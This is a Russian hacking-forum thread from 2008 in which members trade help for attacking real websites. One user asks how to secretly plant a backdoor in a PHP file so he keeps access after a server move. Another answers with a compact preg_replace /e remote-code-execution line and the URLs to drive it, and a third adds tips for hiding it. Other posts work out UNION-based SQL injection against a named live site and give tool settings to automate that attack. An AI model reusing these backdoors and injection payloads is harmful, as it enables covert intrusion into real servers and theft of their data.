Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Ну там возможно просто два запроса что лишает возможности провести инъекцию с выводом данных, но никто не мешает раскрутить её посимвольно:

    Code:
    version(): PostgreSQL 8.2.7 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.1 (Gentoo 4.1.1-r3)
    current_database(): portal
    Кстати т.к. это ПостгриСКЛ, то синтаксис чуть чуть отличается, так что может тебе и удастся раскрутить её не как слепую.

    Смотри статьи:

    https://forum.antichat.ru/showthread.php?t=35599 - здесь немного рассказано про инъекции в скриптах, использующих PostgreSQL.

    https://forum.antichat.ru/thread19844.html - а здесь рассказано про работу со слепыми инъекциями.
     
    #3061 Grey, 27 Aug 2008
    Last edited: 27 Aug 2008
  2. fervex

    fervex New Member

    Joined:
    12 Nov 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Здравствуйте! :)

    Подскажите, пожалуйста:

    в скором времени с сервера, на котором сейчас стоит шелл, все файлы будут переносить на новый сервер, и, вероятно, мой шелл найдут.
    Пока есть возможность, хочется незаметно добавить в php-файл акой-нибудь, свой код, чтобы через него можно было залить шелл на новом сервере.

    Подскажите, какой код можно добавить в существующий php-файл не очень большого размера (строк 100), чтобы это было как можно меньше заметно разработчикам?

    функция system - отключена :)

    Спасибо!
     
  3. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Добавь строку:

    PHP:
    if(isset($_GET['act']) and iseet($_GET['id4'])) preg_replace("/55/e",$_GET['act'],$_GET['id4']); 
    И обращайся к серву так:

    Code:
    script.php?id4=55&act=phpinfo();
    script.php?id4=55&act=[PHPCODE]
    Сможешь выполнять php код.
    Помоему это достаточно компактный и безпалевный вариант троянизации скриптов.
     
    #3063 Grey, 27 Aug 2008
    Last edited: 27 Aug 2008
    1 person likes this.
  4. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    >>Помоему это достаточно компактный и безпалевный вариант троянизации скриптов.

    Лучше уж тогда $_REQUEST["act"], post или cookie по безпалевней будут. Хотя вариантов море впринципе.
     
    2 people like this.
  5. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    БД MS ACCESS
    Code:
    site.com/Def.asp?id=222+1,2,mail,4,5+from+costumers
    возникла такая проблема знаю имя табцицы и имя нужной колонки каким образом можно вывести инфу ? лимита там нет можно чем нибудь заменить ? where тоже воспользоваться не получаеться ((
    заранее спасибо
     
    #3065 MaSTeR GэN, 28 Aug 2008
    Last edited: 28 Aug 2008
  6. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    https://forum.antichat.ru/showthread.php?t=33690
     
  7. Mixon

    Mixon Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    394
    Likes Received:
    119
    Reputations:
    12
    Здраствуйте,у меня вот возникла такая проблема,я вот нашел уязвимость на сайте,я могу через ссылку в страницу запихнуть любой код, и html и javascript,все что вожу,все отображается на странице,вот только одно то что php никаким образом там не идет,я какой скрипт в страницу не запыхиваю,то сервер его не обрабатывает,а в исходном коде страницы виден всесь скрипт,и есче там фильтр перед ' и " ставит \ как можно залить шелл на етот сайт,есле пхп код когда оказывается в странице не работает....кста,а просто пхп там работает,там весь сайт построин из пхп страниц,и есче,там сервер у них стоит LiteSpeed Web Server может кто подскажит что делать дальше???
     
  8. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    ыыыы давно так не смеялся =)
    через xss ты не сможешь исполнить php код =), только яваскрипт на стороне клиента. Скорей бы школа..
     
  9. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    http://forum.antichat.ru/showpost.php?p=836658&postcount=3099
    отвечю сам на cвой вопрос нужно юзать select TOP X * from table
    выводит X стоку из table )
    всем спасибо :)
     
  10. Mixon

    Mixon Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    394
    Likes Received:
    119
    Reputations:
    12
    Гг,ето мне уже обьяснили)) Ну хоть веселее стало те))И за школу не боись,день рождение дьявола будет уже скоро, до 1 числа есче 3 дня.... :( есле бы 3 месяца...
     
  11. zjuk@

    zjuk@ New Member

    Joined:
    4 Sep 2007
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    Всем снова здоавствуйте, такая проблема:
    при запросе
    _http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2&t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+TABLE_NAME,2,3,4+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+23,1/**/
    получаем:
    если попробовать проработать таблицу 'cucca_logins':

    _http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2&t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+COLUMN_NAME,2,3,4+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=cucca_logins+limit+23,1/**/
    И опять получаем:
    с cucca_users таже истории
    Помогите пожалуйста, что я делаю не так?
     
    #3071 zjuk@, 29 Aug 2008
    Last edited: 29 Aug 2008
  12. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    во-первых, /**/ ты открыл комментарий и тут же его закрыл. измени /**/ на /* или --
    во-вторых, возми в ковычки во втором запросе cucca_logins
    в-третьих, пропиши limit 1,10 для начала
     
  13. zjuk@

    zjuk@ New Member

    Joined:
    4 Sep 2007
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    с кавычками меня послали, LIMIT в данном случае значения не имеет, а замена /**/ на -- ни к чему не привела.
     
  14. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    Скачай SIPT (http://forum.antichat.ru/thread24918-SIPT.html)
    Настройки поставь
    Code:
    URL=http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2&t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1{SQLINJ}
    Key=Unknown column 
    Search key by=Found
    Close SQL=(ничего)
    
    и все. /* тут вообще не надо и без него работает.
    у меня работает и все находит.
     
    #3074 Grema, 29 Aug 2008
    Last edited: 29 Aug 2008
  15. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Все работает. Под чаром cucca_logins , так как кавчки экранирует
     
    2 people like this.
  16. zjuk@

    zjuk@ New Member

    Joined:
    4 Sep 2007
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    спасибо большое, оказывается в запросе очипятывался =)
    Спасибо есть, тока при поиске столбцов вылетает =( а при поиске таблиц нормально.
    Пасибки всем
     
  17. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    попробуй с моими настройками может прокатит, то у меня столбцы показывает. Если не получиться, говори в какой таблице столбцы надо
     
  18. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    помогите определить тип хеша
    Code:
    %C6%EF%23%5D%B6%E8%E9%3D%3B%A7%D0%A9%18%9FX%C1%13%08s%D5%B0%DAG%5CF%DFV%DA%0D%DE%BCe
    вот ещё один
    Code:
    1%FC%D47__%F8%B97x%1E%3F8%212_%D1%FA%AA_%11o%D3%D2%21%3FK%06%B4%02U%24
    двиг сайта с которого выдрал хеши самописный
    з.ы. хеши без пробелов
     
  19. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    это url кодировка
     
    1 person likes this.
  20. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    html_full походу

    вот faq о хэшах:

    http://forum.antichat.ru/thread26983.html
     
    #3080 USAkid, 29 Aug 2008
    Last edited: 29 Aug 2008
Thread Status:
Not open for further replies.